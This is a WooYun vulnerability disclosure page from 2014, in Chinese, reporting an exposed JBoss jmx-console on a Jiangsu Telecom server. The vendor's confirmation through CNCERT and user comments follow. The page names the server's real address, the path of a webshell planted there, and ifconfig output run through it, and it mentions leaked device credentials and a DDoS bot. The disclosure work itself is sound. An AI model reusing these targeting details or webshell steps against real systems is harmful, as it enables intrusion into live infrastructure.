当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-073289

漏洞标题:江苏电信某核心业务系统Jboss漏洞已shell

相关厂商:中国电信

漏洞作者: JulyTornado

提交时间:2014-08-21 16:37

修复时间:2014-10-05 16:38

公开时间:2014-10-05 16:38

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-21: 细节已通知厂商并且等待厂商处理中
2014-08-26: 厂商已经确认,细节仅向厂商公开
2014-09-05: 细节向核心白帽子及相关领域专家公开
2014-09-15: 细节向普通白帽子公开
2014-09-25: 细节向实习白帽子公开
2014-10-05: 细节向公众公开

简要描述:

由jboss权限控制不严导致。偶然发现,水表已拆,快递拒收。。。。。

详细说明:

http://61.177.86.27:8080/jmx-console/ 可直接访问,暴露webshell

J2EEApplication=null,J2EEServer=Local,WebModule=wcscmd.war,j2eeType=Servlet,name=default 
J2EEApplication=null,J2EEServer=Local,WebModule=wcscmd.war,j2eeType=Servlet,name=jsp 
J2EEApplication=null,J2EEServer=Local,WebModule=zecmd.war,j2eeType=Servlet,name=default 
J2EEApplication=null,J2EEServer=Local,WebModule=zecmd.war,j2eeType=Servlet,name=jsp


webshell地址:
http://61.177.86.27:8080/zecmd/zecmd.jsp

Command: ifconfig
eth0      Link encap:Ethernet  HWaddr 00:23:7D:D3:26:08  
          inet addr:132.228.36.82  Bcast:132.228.36.95  Mask:255.255.255.240
          inet6 addr: fe80::223:7dff:fed3:2608/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1321060332 errors:0 dropped:1818 overruns:0 frame:0
          TX packets:358858752 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:296258489 (282.5 MiB)  TX bytes:3589724056 (3.3 GiB)
          Interrupt:169 Memory:f8000000-f8012100 
eth1      Link encap:Ethernet  HWaddr 00:23:7D:D3:26:0A  
          inet addr:192.168.6.213  Bcast:192.168.6.255  Mask:255.255.255.0
          inet6 addr: fe80::223:7dff:fed3:260a/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2736224786 errors:0 dropped:83157 overruns:0 frame:0
          TX packets:990698413 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:206608419 (197.0 MiB)  TX bytes:1947247942 (1.8 GiB)
          Interrupt:177 Memory:fa000000-fa012100 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:2623968690 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2623968690 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:413522104 (394.3 MiB)  TX bytes:413522104 (394.3 MiB)


各种骨干网核心设备配置泄露,包括用户名密码:

核心设备配置1.png


核心设备配置2.png


核心设备配置3.png


数据库接口:

数据接口.png


由此看来,该服务器涉及核心业务。。。
服务器已沦为ddos肉鸡。。。

ddos远控.png

漏洞证明:

首页.png


jboss漏洞.png


jboss漏洞1.png


webshell.png

修复方案:

系统太庞大,没时间深入了,你们比我懂。。。。

版权声明:转载请注明来源 JulyTornado@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-08-26 10:14

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT通报给中国电信集团公司处置。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-08-21 17:16 | 爱Gail ( 普通白帽子 | Rank:237 漏洞数:38 | 爱漏洞、爱编程、爱旅游、爱Gail)

    上峰正检查过程中来这个,占坐看

  2. 2014-08-26 12:47 | nzk1912 ( 实习白帽子 | Rank:41 漏洞数:10 | 软件开发8年了,也来挖挖漏洞,为创建安全...)

    马克

  3. 2014-09-30 16:30 | nzk1912 ( 实习白帽子 | Rank:41 漏洞数:10 | 软件开发8年了,也来挖挖漏洞,为创建安全...)

    我也看过这个网站,我咋没发现还有一个后台呢~密码手工没试出来

  4. 2014-10-04 20:10 | JulyTornado ( 普通白帽子 | Rank:339 漏洞数:43 | 善战者,无赫赫之功)

    jboss默认路径呀,用wwwscan之类的能扫到。。。

  5. 2014-10-05 11:11 | nzk1912 ( 实习白帽子 | Rank:41 漏洞数:10 | 软件开发8年了,也来挖挖漏洞,为创建安全...)

    @JulyTornado 好的,回头试试。